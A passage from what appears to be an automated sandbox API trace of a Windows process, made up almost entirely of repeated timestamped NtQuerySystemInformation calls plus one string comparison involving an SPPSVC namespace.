SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd568, Length=0x50, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x28, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0227.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0227.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x50, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0227.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x28, ResultLength=0x0) [0227.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0227.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0227.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.898] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f8, Length=0x50, ResultLength=0x0) [0227.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x28, ResultLength=0x0) [0227.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0227.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x28, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, 